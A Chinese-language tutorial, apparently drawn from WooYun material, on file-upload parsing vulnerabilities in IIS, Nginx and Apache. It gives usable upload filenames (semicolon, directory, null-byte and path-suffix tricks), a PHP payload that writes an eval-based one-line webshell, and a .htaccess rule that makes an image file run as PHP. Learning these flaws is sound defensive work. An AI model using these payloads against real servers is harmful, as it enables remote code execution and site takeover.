解決這問(wèn)題要明白解析漏洞
一、IIS 5.x/6.0解析漏洞
IIS 6.0解析利用方法有兩種
1.目錄解析
/xx.asp/xx.jpg
2.文件解析
wooyun.asp;.jpg
第一種,在網(wǎng)站下建立文件夾的名字為 .asp、.asa 的文件夾,其目錄內的任何擴展名的文件都被IIS當作asp文件來(lái)解析并執行。
例如創(chuàng )建目錄 wooyun.asp,那么
/wooyun.asp/1.jpg
將被當作asp文件來(lái)執行。假設黑闊可以控制上傳文件夾路徑,就可以不管你上傳后你的圖片改不改名都能拿shell了。
第二種,在IIS6.0下,分號后面的不被解析,也就是說(shuō)
wooyun.asp;.jpg
會(huì )被服務(wù)器看成是wooyun.asp還有IIS6.0 默認的可執行文件除了asp還包含這三種
/wooyun.asa
/wooyun.cer
/wooyun.cdx
二、IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞
Nginx解析漏洞這個(gè)偉大的漏洞是我國安全組織80sec發(fā)現的…
在默認Fast-CGI開(kāi)啟狀況下,黑闊上傳一個(gè)名字為wooyun.jpg,內容為
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
的文件,然后訪(fǎng)問(wèn)wooyun.jpg/.php,在這個(gè)目錄下就會(huì )生成一句話(huà)木馬 shell.php
三、Nginx <8.03 空字節代碼執行漏洞
影響版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37
Nginx在圖片中嵌入PHP代碼然后通過(guò)訪(fǎng)問(wèn)
xxx.jpg%00.php
來(lái)執行其中的代碼
四、Apache解析漏洞
Apache 是從右到左開(kāi)始判斷解析,如果為不可識別解析,就再往左判斷.
比如 wooyun.php.owf.rar “.owf”和”.rar” 這兩種后綴是apache不可識別解析,apache就會(huì )把wooyun.php.owf.rar解析成php.
如何判斷是不是合法的后綴就是這個(gè)漏洞的利用關(guān)鍵,測試時(shí)可以嘗試上傳一個(gè)wooyun.php.rara.jpg.png…(把你知道的常見(jiàn)后綴都寫(xiě)上…)去測試是否是合法后綴
五、其他
在windows環(huán)境下,xx.jpg[空格] 或xx.jpg. 這兩類(lèi)文件都是不允許存在的,若這樣命名,windows會(huì )默認除去空格或點(diǎn),黑客可以通過(guò)抓包,在文件名后加一個(gè)空格或者點(diǎn)繞過(guò)黑名單.若上傳成功,空格和點(diǎn)都會(huì )被windows自動(dòng)消除,這樣也可以getshell。
如果在A(yíng)pache中.htaccess可被執行.且可被上傳.那可以嘗試在.htaccess中寫(xiě)入:
<FilesMatch "wooyun.jpg"> SetHandler application/x-httpd-php </FilesMatch>
然后再上傳shell.jpg的木馬, 這樣shell.jpg就可解析為php文件
聯(lián)系客服